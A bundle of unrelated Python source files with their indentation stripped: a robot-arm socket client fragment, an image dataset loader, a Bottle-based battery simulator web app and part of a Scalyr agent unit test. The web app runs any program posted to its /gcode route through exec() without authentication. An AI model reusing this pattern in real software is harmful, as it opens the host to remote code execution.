print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('Press 1 to start transmission, 3 to exit: ')) # input start command
start_input = 1
if start_input==1:
while 1:
##---------------socket transmission of arm commands-----------------
if Arm_feedback == 0:
#-------select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------set arm fast & safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ## switch back to the initial mode state
s.send(data.encode('utf-8')) # socket send; encode the str for transmission
feedback_str = s.recv(1024)
# the arm side reports the arm state
if str(feedback_str[2]) == '70':# 'F': arm is ready to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# 'T': arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# '6': strategy finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## switch to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C   Add line comment
# Ctrl+K Ctrl+U   Remove line comment
# Ctrl+] / Ctrl+[ Indent/outdent line
|
dataset.py
|
import os
import random
from Queue import Queue
from threading import Thread
import time
from PIL import Image
import numpy
def shuffle(data):
perm = range(len(data))
random.shuffle(perm)
shuffled = [data[i] for i in perm]
return shuffled
def load_image_file(data_dir, join_path=False, image_suffix='.jpg', label=None):
if not os.path.exists(data_dir):
return []
if label:
files = [f for f in os.listdir(data_dir) if f.endswith(image_suffix) and f.startswith(label)]
else:
files = [f for f in os.listdir(data_dir) if f.endswith(image_suffix)]
if join_path:
files = [os.path.join(data_dir, f) for f in files]
return shuffle(files)
def load_label(data_dir, delimiter='_', image_suffix='.jpg'):
files = load_image_file(data_dir, False, image_suffix)
labels = set()
for f in files:
label = f.split(delimiter)[0]
labels.add(label)
labels = list(labels)
labels.sort()
return labels, len(labels)
def dense_to_one_hot(labels_dense, num_classes):
"""Convert class labels from scalars to one-hot vectors."""
num_labels = labels_dense.shape[0]
index_offset = numpy.arange(num_labels) * num_classes
labels_one_hot = numpy.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
# ==============================================================
'''Constants - Feel free to change'''
data_dir = 'test/data' # image directory
delimiter = '.'
label_names, num_classes = load_label(data_dir, delimiter)
data_rate=[0.8, 0.1, 0.1] # a list of train, validation, test data rate
# ==============================================================
def extract_label(filename, one_hot=False):
label = filename.split('/')[-1].split(delimiter)[0]
label_index = label_names.index(label)
if one_hot:
return dense_to_one_hot(numpy.array([label_index]), num_classes)[0]
return label_index
def load_files_by_class(data_dir, delimiter):
print('data_dir:%s, delimiter:%s' %(data_dir, delimiter))
label_names, num_classes = load_label(data_dir, delimiter)
files = [load_image_file(data_dir, join_path=True, label=l) for l in label_names]
counter = [len(f) for f in files]
return files, counter
def random_build(data_dir=data_dir, delimiter=delimiter):
files, counter = load_files_by_class(data_dir, delimiter)
dataset = [[], [], []]
for i, rate in enumerate(data_rate, start=0):
for j, f in enumerate(files, start=0):
random.shuffle(f)
end = int(rate * counter[j])
dataset[i].extend(f[: end])
train, validation, test = dataset
random.shuffle(train)
random.shuffle(validation)
random.shuffle(test)
print(len(train), len(validation), len(test))
return train, validation, test
def split_build(data_dir=data_dir, delimiter=delimiter):
files, counter = load_files_by_class(data_dir, delimiter)
train, validation, test = [], [], []
for i, f in enumerate(files, start=0):
random.shuffle(f)
start = int(data_rate[0] * counter[i])
train.extend(f[: start])
end = counter[i] - int(data_rate[2] * counter[i])
validation.extend(f[start: end])
test.extend(f[end: ])
# print('start:%d, end:%d' %(start, end))
random.shuffle(train)
random.shuffle(validation)
random.shuffle(test)
print(len(train), len(validation), len(test))
return train, validation, test
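# Load images with a small thread pool: file names are pushed onto an input queue, worker
# threads decode/resize/normalize each image and push (image, label) pairs onto an output
# queue, and the results are collected once all tasks are done.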
def read_image(files, num_worker_threads=5, size=(227, 227), one_hot=False):
input_queue = Queue()
for f in files:
input_queue.put(f)
# print('input queue size:%d' %(input_queue.qsize()))
output_queue = Queue()
def worker():
while not input_queue.empty():
filename = input_queue.get()
image = numpy.array(Image.open(filename).convert('RGB').resize(size))
# Convert from [0, 255] -> [0.0, 1.0]
image = image.astype(numpy.float32)
image = numpy.multiply(image, 1.0 / 255.0)
label = extract_label(filename, one_hot=one_hot)
output_queue.put((image, label))
input_queue.task_done()
for i in range(num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
input_queue.join() # block until all tasks are done
images = []
labels = []
while not output_queue.empty():
image, label = output_queue.get()
images.append(image)
labels.append(label)
return numpy.array(images), numpy.array(labels)
class Dataset(object):
"""docstring for Dataset"""
def __init__(self, files):
super(Dataset, self).__init__()
self._files = shuffle(files)
self._num_examples = len(files)
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def files(self):
return self._files
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def num_epochs(self, batch_size):
"""Return the total epochs in this data set by given batch_size."""
return self._num_examples // batch_size
def next_batch_file(self, batch_size):
"""Return the next `batch_size` examples from this data set."""
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
self._files = shuffle(self._files)
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._files[start:end]
def next_batch(self, batch_size, one_hot=True):
"""Return the next `batch_size` examples from this data set."""
batch_file = self.next_batch_file(batch_size)
return read_image(batch_file, one_hot=one_hot)
def load_all(self, one_hot=True):
return read_image(self._files, one_hot=one_hot)
class DatasetQueue(Thread):
"""docstring for DatasetQueue"""
def __init__(self, dataset, batch_size=128, qsize=10):
super(DatasetQueue, self).__init__()
self._dataset = dataset
self._batch_size = batch_size
self._queue = Queue(qsize)
self._thread_stop = False
def run(self):
while not self._thread_stop:
print('queue size:%d' %(self._queue.qsize()))
images, labels = self._dataset.next_batch(self._batch_size)
self._queue.put((images, labels))
def stop(self):
self._thread_stop = True
def next_batch(self):
images, labels = self._queue.get()
return images, labels
|
app.py
|
import threading
import sys, os, time
import glob, json, argparse, copy, base64  # base64 is used by encode/decode_filename below
import socket, webbrowser
from wsgiref.simple_server import WSGIRequestHandler, make_server
from bottle import *
import serial  # needed for serial.SerialException in the /serial route handler
from serial_manager import SerialManager
from batterySimulator import TimeMachine
waitEvent = threading.Event()
tm = TimeMachine()
APPNAME = "TS_BatterySimulator"
VERSION = "0.1"
COMPANY_NAME = "com.bhl"
SERIAL_PORT = None #'COM1'
BITSPERSECOND = 9600
NETWORK_PORT = 4567
HARDWARE = 'x86' # also: 'beaglebone', 'raspberrypi'
CONFIG_FILE = "TS_BatterySimulator.conf"
GUESS_PREFIX = "no prefix"
graphDataLengthMax = 128 # default max data length of the graph
pct = 0
quitFlag = False
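# Split the uploaded command file into top-level Python statements: a line that starts at
# column 0 begins a new segment, while indented continuation lines are appended to the
# previous segment so each segment can be exec'd as a unit.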
def parseLines(f):
pySegs = []
for line in f:
if len(line.strip()) <=0:
continue
if line[0] != ' ' and line[0] !='\t':
if line != '':
pySegs.append(line)
else:
pySegs[-1] = pySegs[-1] + line
return pySegs
def CommandProcessor(e):
'''
execute command lines from webgui
'''
global pct,quitFlag
while True:
tm.status['paused'] = True
print('Waiting for event to start..')
event_is_set = e.wait()
tm.status['paused'] = False
print('Running...')
try:
f = open('currentCommandList.py','r')
lines = parseLines(f)
totalCount = len(lines)
f.close()
for i,line in enumerate(lines):
try:
exec(line)
except:
print('error in line:%s'%line)
pct = int((1.0+i)/totalCount * 100)
print('exec percentage: ' + str(pct) + '%')
e.wait()
if quitFlag:
print('quit signal captured!')
break
pct = 100
quitFlag = True
except:
print('error in exec')
print('command ended!')
e.clear()
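# Serial worker: polls the serial port for single-letter UART commands (see the docstring
# below) and replies with values from the battery simulator, e.g. per-cell voltage, total
# voltage/current, relay state and the simulation clock.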
def serialProcessor():
global quitFlag
RelayStatus=0
'''
process serial command and send response.
'V' // UART-command for receiving
'T' //UART-command for read temperature
'F' //UART-command for read flag
'R' //UART-command for read total voltage
'I' //UART-command for read total current
'C' //UART-command for close the relay
'O' //UART-command for open the relay
'P' //UART-command for receiving the PWM rate
'J' //UART-command for read time
'K' //UART-command for kill the simulation
'''
while True:
try:
chars = SerialManager.read_to('\r')
if len(chars) > 0:
print('Processing Command:' + chars)
stackNum = int(chars[1])
cellNum = int(chars[2:4])
#cellNum=int(chars[2])*10 + int(chars[3])
index = stackNum*tm.NumberOfCells+cellNum
#print "stackNum %d, cellNum %d, index %d" %(stackNum,cellNum,index)
if chars[0] == 'V':
SerialManager.write(str(tm.status['voltageList'][index])+ '\r')
elif chars[0] == 'B':
tm.bg[index].balanceRate = 1.0 * int(chars[4:])/100.0
#print 'balcenRate is:', tm.bg[index].balanceRate
elif chars[0] == 'T':
SerialManager.write(str(0)+ '\r')
elif chars[0] == 'R':
totalVoltage=sum(tm.status['voltageList'][:])
SerialManager.write(str(totalVoltage)+ '\r')
elif chars[0] == 'I':
totalCurrent=sum(tm.status['voltageList'][:])/tm.load
SerialManager.write(str(totalCurrent)+ '\r')
elif chars[0] == 'C':
RelayStatus=1
SerialManager.write(str(RelayStatus)+ '\r')
elif chars[0] == 'O':
RelayStatus=0
SerialManager.write(str(RelayStatus)+ '\r')
elif chars[0] == 'J':
SerialManager.write(str(tm.clock)+ '\r')
elif chars[0] == 'K':
quitFlag = True
else:
print 'Command Not Defined'
SerialManager.write('Command Not Defined'+ '\r')
time.sleep(0.08)
except:
print("error when processing command")
time.sleep(0.1)
def resources_dir():
"""This is to be used with all relative file access.
_MEIPASS is a special location for data files when creating
standalone, single file python apps with pyInstaller.
Standalone is created by calling from 'other' directory:
python pyinstaller/pyinstaller.py --onefile app.spec
"""
if hasattr(sys, "_MEIPASS"):
return sys._MEIPASS
else:
# root is one up from this file
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../'))
def storage_dir():
directory = ""
if sys.platform == 'darwin':
# from AppKit import NSSearchPathForDirectoriesInDomains
# # NSApplicationSupportDirectory = 14
# # NSUserDomainMask = 1
# # True for expanding the tilde into a fully qualified path
# appdata = path.join(NSSearchPathForDirectoriesInDomains(14, 1, True)[0], APPNAME)
directory = os.path.join(os.path.expanduser('~'), 'Library', 'Application Support', COMPANY_NAME, APPNAME)
elif sys.platform == 'win32':
directory = os.path.join(os.path.expandvars('%APPDATA%'), COMPANY_NAME, APPNAME)#C:\Users\oeshine\AppData\Roaming\com.bhl
else:
directory = os.path.join(os.path.expanduser('~'), "." + APPNAME)
if not os.path.exists(directory):
os.makedirs(directory)
return directory
class HackedWSGIRequestHandler(WSGIRequestHandler):
""" This is a heck to solve super slow request handling
on the BeagleBone and RaspberryPi. The problem is WSGIRequestHandler
which does a reverse lookup on every request calling gethostbyaddr.
For some reason this is super slow when connected to the LAN.
(adding the IP and name of the requester to the /etc/hosts file
solves the problem but obviously is not practical)
"""
def address_string(self):
"""Instead of calling getfqdn -> gethostbyaddr we ignore."""
# return "(a requester)"
return str(self.client_address[0])
def run_with_callback(host, port):
""" Start a wsgiref server instance with control over the main loop.
This is a function that I derived from the bottle.py run()
"""
handler = default_app()
server = make_server(host, port, handler, handler_class=HackedWSGIRequestHandler)
server.timeout = 0.01
server.quiet = True
print "Persistent storage root is: " + storage_dir()
print "-----------------------------------------------------------------------------"
print "Bottle server starting up ..."
print "Serial is set to %d bps" % BITSPERSECOND
print "Point your browser to: "
print "http://%s:%d/ (local)" % ('127.0.0.1', port)
# if host == '':
# try:
# print "http://%s:%d/ (public)" % (socket.gethostbyname(socket.gethostname()), port)
# except socket.gaierror:
# # print "http://beaglebone.local:4444/ (public)"
# pass
print "Use Ctrl-C to quit."
print "-----------------------------------------------------------------------------"
print
# auto-connect on startup
global SERIAL_PORT
if not SERIAL_PORT:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
SerialManager.connect(SERIAL_PORT, BITSPERSECOND)
# open web-browser
try:
webbrowser.open_new_tab('http://127.0.0.1:'+str(port))
pass
except webbrowser.Error:
print "Cannot open Webbrowser, please do so manually."
sys.stdout.flush() # make sure everything gets flushed
while 1:
try:
server.handle_request()
#tm.run()
except KeyboardInterrupt:
break
print "\nShutting down..."
SerialManager.close()
@route('/hello')
def hello_handler():
return "Hello World!!"
@route('/css/:path#.+#')
def static_css_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/css'))
@route('/js/:path#.+#')
def static_js_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/js'))
@route('/img/:path#.+#')
def static_img_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'frontend/img'))
@route('/favicon.ico')
def favicon_handler():
return static_file('favicon.ico', root=os.path.join(resources_dir(), 'frontend/img'))
### LIBRARY
@route('/library/get/:path#.+#')
def static_library_handler(path):
return static_file(path, root=os.path.join(resources_dir(), 'library'), mimetype='text/plain')
@route('/library/list')
def library_list_handler():
# return a json list of file names
file_list = []
cwd_temp = os.getcwd()
try:
os.chdir(os.path.join(resources_dir(), 'library'))
file_list = glob.glob('*')
finally:
os.chdir(cwd_temp)
return json.dumps(file_list)
### QUEUE
def encode_filename(name):
return str(time.time()) + '-' + base64.urlsafe_b64encode(name)
def decode_filename(name):
index = name.find('-')
return base64.urlsafe_b64decode(name[index+1:])
@route('/queue/get/:name#.+#')
def static_queue_handler(name):
return static_file(name, root=storage_dir(), mimetype='text/plain')
@route('/queue/list')
def queue_list_handler():
# base64.urlsafe_b64encode()
# base64.urlsafe_b64decode()
# return a json list of file names
files = []
cwd_temp = os.getcwd()
try:
os.chdir(storage_dir())
files = filter(os.path.isfile, glob.glob("*"))
files.sort(key=lambda x: os.path.getmtime(x))
finally:
os.chdir(cwd_temp)
return json.dumps(files)
@route('/queue/save', method='POST')
def queue_save_handler():
ret = '0'
if 'command_list_name' in request.forms and 'command_program' in request.forms:
name = request.forms.get('command_list_name')
command_program = request.forms.get('command_program')
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if os.path.exists(filename) or os.path.exists(filename+'.starred'):
return "file_exists"
try:
fp = open(filename, 'w')
fp.write(command_program)
print "file saved: " + filename
ret = '1'
finally:
fp.close()
else:
print "error: save failed, invalid POST request"
return ret
@route('/queue/rm/:name')
def queue_rm_handler(name):
# delete gcode item, on success return '1'
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename):
try:
                os.remove(filename)
print "file deleted: " + filename
ret = '1'
finally:
pass
return ret
@route('/queue/star/:name')
def queue_star_handler(name):
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename):
os.rename(filename, filename + '.starred')
ret = '1'
return ret
@route('/queue/unstar/:name')
def queue_unstar_handler(name):
ret = '0'
filename = os.path.abspath(os.path.join(storage_dir(), name.strip('/\\')))
if filename.startswith(storage_dir()):
if os.path.exists(filename + '.starred'):
os.rename(filename + '.starred', filename)
ret = '1'
return ret
@route('/')
@route('/index.html')
@route('/app.html')
def default_handler():
return static_file('app.html', root=os.path.join(resources_dir(), 'frontend') )
@route('/canvas')
def canvas_handler():
return static_file('testCanvas.html', root=os.path.join(resources_dir(), 'frontend'))
@route('/serial/:connect')
def serial_handler(connect):
if connect == '1':
# print 'js is asking to connect serial'
if not SerialManager.is_connected():
try:
global SERIAL_PORT, BITSPERSECOND, GUESS_PREFIX
if not SERIAL_PORT:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
SerialManager.connect(SERIAL_PORT, BITSPERSECOND)
ret = "Serial connected to %s:%d." % (SERIAL_PORT, BITSPERSECOND) + '<br>'
time.sleep(1.0) # allow some time to receive a prompt/welcome
SerialManager.flush_input()
SerialManager.flush_output()
return ret
except serial.SerialException:
SERIAL_PORT = None
print "Failed to connect to serial."
return ""
elif connect == '0':
# print 'js is asking to close serial'
if SerialManager.is_connected():
if SerialManager.close(): return "1"
else: return ""
elif connect == "2":
# print 'js is asking if serial connected'
if SerialManager.is_connected(): return "1"
else: return ""
else:
        print 'ambiguous connect request from js: ' + connect
return ""
@route('/status')
def get_status():
status = copy.deepcopy(tm.status)
status['serial_connected'] = SerialManager.is_connected()
return json.dumps(status)
@route('/pause/:flag')
def set_pause(flag):
global quitFlag
if flag == '1':
quitFlag = False
waitEvent.clear()
elif flag == '0':
quitFlag = False
waitEvent.set()
return flag
@route('/reset')
def reset_handler():
return '1'
@route('/stop')
def stop_handler():
    global quitFlag
    quitFlag = True
    #waitEvent.set()
    return 'Stop flag set!'
@route('/gcode', method='POST')
def gcode_submit_handler():
global pct,quitFlag
command_program = request.forms.get('command_program')
if command_program:
try:
f = open('currentCommandList.py','w')
f.write(command_program)
pct = 0
quitFlag = False
waitEvent.set() #start command processor
return "__ok__"
except:
return "write error!"
else:
return "disconnected"
@route('/queue_pct_done')
def queue_pct_done_handler():
global pct,quitFlag
if quitFlag:
return None
return str(pct)
@route('/graph_data_length_max')
def graph_data_length_max_handler():
return str(graphDataLengthMax)
@route('/svg_reader', method='POST')
def svg_upload():
"""Parse SVG string."""
filename = request.forms.get('filename')
filedata = request.forms.get('filedata')
if filename and filedata:
print "You uploaded %s (%d bytes)." % (filename, len(filedata))
#if filename[-4:] in ['.dxf', '.DXF']:
# res = read_dxf(filedata, TOLERANCE, optimize)
#else:
# res = read_svg(filedata, [1220,610], TOLERANCE, dpi_forced, optimize)
# print boundarys
jsondata = json.dumps({})
# print "returning %d items as %d bytes." % (len(res['boundarys']), len(jsondata))
return jsondata
return "You missed a field."
### Setup Argument Parser
argparser = argparse.ArgumentParser(description='Run TS_BatterySimulator.', prog='TS_BatterySimulator')
argparser.add_argument('port', metavar='serial_port', nargs='?', default=False,
help='serial port to the Simulator')
argparser.add_argument('-v', '--version', action='version', version='%(prog)s ' + VERSION)
argparser.add_argument('-p', '--public', dest='host_on_all_interfaces', action='store_true',
default=False, help='bind to all network devices (default: bind to 127.0.0.1)')
argparser.add_argument('-l', '--list', dest='list_serial_devices', action='store_true',
default=False, help='list all serial devices currently connected')
argparser.add_argument('-d', '--debug', dest='debug', action='store_true',
default=False, help='print more verbose for debugging')
argparser.add_argument('--beaglebone', dest='beaglebone', action='store_true',
default=False, help='use this for running on beaglebone')
argparser.add_argument('--raspberrypi', dest='raspberrypi', action='store_true',
default=False, help='use this for running on Raspberry Pi')
argparser.add_argument('-m', '--match', dest='match',
default=GUESS_PREFIX, help='match serial device with this string')
args = argparser.parse_args()
print "TS_BatterySimulator " + VERSION
if args.beaglebone:
HARDWARE = 'beaglebone'
NETWORK_PORT = 80
### if running on beaglebone, setup (pin muxing) and use UART1
# for details see: http://www.nathandumont.com/node/250
SERIAL_PORT = "/dev/ttyO1"
# echo 0 > /sys/kernel/debug/omap_mux/uart1_txd
fw = file("/sys/kernel/debug/omap_mux/uart1_txd", "w")
fw.write("%X" % (0))
fw.close()
# echo 20 > /sys/kernel/debug/omap_mux/uart1_rxd
fw = file("/sys/kernel/debug/omap_mux/uart1_rxd", "w")
fw.write("%X" % ((1 << 5) | 0))
fw.close()
### Set up atmega328 reset control
# The reset pin is connected to GPIO2_7 (2*32+7 = 71).
# Setting it to low triggers a reset.
# echo 71 > /sys/class/gpio/export
try:
fw = file("/sys/class/gpio/export", "w")
fw.write("%d" % (71))
fw.close()
except IOError:
# probably already exported
pass
# set the gpio pin to output
# echo out > /sys/class/gpio/gpio71/direction
fw = file("/sys/class/gpio/gpio71/direction", "w")
fw.write("out")
fw.close()
# set the gpio pin high
# echo 1 > /sys/class/gpio/gpio71/value
fw = file("/sys/class/gpio/gpio71/value", "w")
fw.write("1")
fw.flush()
fw.close()
### read stepper driver configure pin GPIO2_12 (2*32+12 = 76).
# Low means Geckos, high means SMC11s
try:
fw = file("/sys/class/gpio/export", "w")
fw.write("%d" % (76))
fw.close()
except IOError:
# probably already exported
pass
# set the gpio pin to input
fw = file("/sys/class/gpio/gpio76/direction", "w")
fw.write("in")
fw.close()
    # read the gpio pin value
fw = file("/sys/class/gpio/gpio76/value", "r")
ret = fw.read()
fw.close()
print "Stepper driver configure pin is: " + str(ret)
elif args.raspberrypi:
HARDWARE = 'raspberrypi'
NETWORK_PORT = 80
SERIAL_PORT = "/dev/ttyAMA0"
import RPi.GPIO as GPIO
    # GPIO.setwarnings(False) # suppress warnings
GPIO.setmode(GPIO.BCM) # use chip pin number
pinSense = 7
pinReset = 2
pinExt1 = 3
pinExt2 = 4
pinExt3 = 17
pinTX = 14
pinRX = 15
# read sens pin
GPIO.setup(pinSense, GPIO.IN)
isSMC11 = GPIO.input(pinSense)
# atmega reset pin
GPIO.setup(pinReset, GPIO.OUT)
GPIO.output(pinReset, GPIO.HIGH)
    # no need to set up the serial pins
    # although /boot/cmdline.txt and /etc/inittab need
# to be edited to deactivate the serial terminal login
# (basically anything related to ttyAMA0)
if args.list_serial_devices:
SerialManager.list_devices(BITSPERSECOND)
else:
if not SERIAL_PORT:
if args.port:
# (1) get the serial device from the argument list
SERIAL_PORT = args.port
print "Using serial device '"+ SERIAL_PORT +"' from command line."
else:
# (2) get the serial device from the config file
if os.path.isfile(CONFIG_FILE):
fp = open(CONFIG_FILE)
line = fp.readline().strip()
if len(line) > 3:
SERIAL_PORT = line
print "Using serial device '"+ SERIAL_PORT +"' from '" + CONFIG_FILE + "'."
if not SERIAL_PORT:
if args.match:
GUESS_PREFIX = args.match
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
if SERIAL_PORT:
print "Using serial device '"+ str(SERIAL_PORT)
if os.name == 'posix':
# not for windows for now
print "(first device to match: " + args.match + ")"
else:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
if SERIAL_PORT:
print "Using serial device '"+ str(SERIAL_PORT) +"' by best guess."
if not SERIAL_PORT:
print "-----------------------------------------------------------------------------"
print "WARNING: TS_BatterySimulator doesn't know what serial device to connect to!"
print "Make sure the TS_BatterySimulator hardware is connectd to the USB interface."
if os.name == 'nt':
print "ON WINDOWS: You will also need to setup the virtual com port."
print "See 'Installing Drivers': http://arduino.cc/en/Guide/Windows"
print "-----------------------------------------------------------------------------"
#start command processor
commandProcessorThread = threading.Thread(name='commandProcessor',
target=CommandProcessor,
args=(waitEvent,))
commandProcessorThread.start()
#start serial processor
serialProcessorThread = threading.Thread(name='serialProcessor',
target=serialProcessor)
serialProcessorThread.start()
# run
if args.debug:
debug(True)
if hasattr(sys, "_MEIPASS"):
print "Data root is: " + sys._MEIPASS
else:
if args.host_on_all_interfaces:
run_with_callback('', NETWORK_PORT)
else:
run_with_callback('127.0.0.1', NETWORK_PORT)
|
util_test.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
import datetime
import os
import tempfile
import struct
import threading
from mock import patch, MagicMock
import scalyr_agent.util as scalyr_util
from scalyr_agent.util import JsonReadFileException, RateLimiter, FakeRunState, ScriptEscalator, HistogramTracker
from scalyr_agent.util import StoppableThread, RedirectorServer, RedirectorClient, RedirectorError
from scalyr_agent.util import verify_and_get_compress_func
from scalyr_agent.json_lib import JsonObject
from scalyr_agent.test_base import ScalyrTestCase
class TestUtilCompression(ScalyrTestCase):
def setUp(self):
super(TestUtilCompression, self).setUp()
self._data = 'The rain in spain. ' * 1000
def test_zlib(self):
"""Successful zlib compression"""
data = self._data
compress = verify_and_get_compress_func('deflate')
import zlib
self.assertEqual(data, zlib.decompress(compress(data)))
def test_bz2(self):
"""Successful bz2 compression"""
data = self._data
compress = verify_and_get_compress_func('bz2')
import bz2
self.assertEqual(data, bz2.decompress(compress(data)))
def test_bad_compression_type(self):
"""User enters unsupported compression type"""
self.assertIsNone(verify_and_get_compress_func('bad_compression_type'))
def test_bad_compression_lib_exception_on_import(self):
"""Pretend that import bz2/zlib raises exception"""
def _mock_get_compress_module(compression_type):
raise Exception('Mimic exception when importing compression lib')
@patch('scalyr_agent.util.get_compress_module', new=_mock_get_compress_module)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test('deflate')
_test('bz2')
def test_bad_compression_lib_no_compression(self):
"""Pretend that the zlib/bz2 library compress() method doesn't perform any comnpression"""
def _mock_get_compress_module(compression_type):
m = MagicMock()
# simulate module.compress() method that does not compress input data string
m.compress = lambda data, compression_level: data
return m
@patch('scalyr_agent.util.get_compress_module', new=_mock_get_compress_module)
def _test(compression_type):
self.assertIsNone(verify_and_get_compress_func(compression_type))
_test('deflate')
_test('bz2')
class TestUtil(ScalyrTestCase):
def setUp(self):
super(TestUtil, self).setUp()
self.__tempdir = tempfile.mkdtemp()
self.__path = os.path.join(self.__tempdir, 'testing.json')
def test_read_file_as_json(self):
self.__create_file(self.__path, '{ a: "hi"}')
json_object = scalyr_util.read_file_as_json(self.__path)
self.assertEquals(json_object, JsonObject(a='hi'))
def test_read_file_as_json_no_file(self):
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, 'foo')
def test_read_file_as_json_with_bad_json(self):
self.__create_file(self.__path, '{ a: hi}')
self.assertRaises(JsonReadFileException, scalyr_util.read_file_as_json, self.__path)
def test_atomic_write_dict_as_json_file(self):
info = { 'a': "hi" }
scalyr_util.atomic_write_dict_as_json_file( self.__path, self.__path + '~', info )
json_object = scalyr_util.read_file_as_json( self.__path )
self.assertEquals( json_object, JsonObject( a='hi' ) )
def __create_file(self, path, contents):
fp = open(path, 'w')
fp.write(contents)
fp.close()
def test_seconds_since_epoch( self ):
dt = datetime.datetime( 2015, 8, 6, 14, 40, 56 )
expected = 1438872056.0
actual = scalyr_util.seconds_since_epoch( dt )
self.assertEquals( expected, actual )
def test_microseconds_since_epoch( self ):
dt = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
expected = 1438872056123456
actual = scalyr_util.microseconds_since_epoch( dt )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime( self ):
s = "2015-08-06T14:40:56.123456Z"
expected = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_truncated_nano( self ):
s = "2015-08-06T14:40:56.123456789Z"
expected = datetime.datetime( 2015, 8, 6, 14, 40, 56, 123456 )
actual = scalyr_util.rfc3339_to_datetime( s )
self.assertEquals( expected, actual )
def test_rfc3339_to_datetime_bad_format_date_and_time_separator( self ):
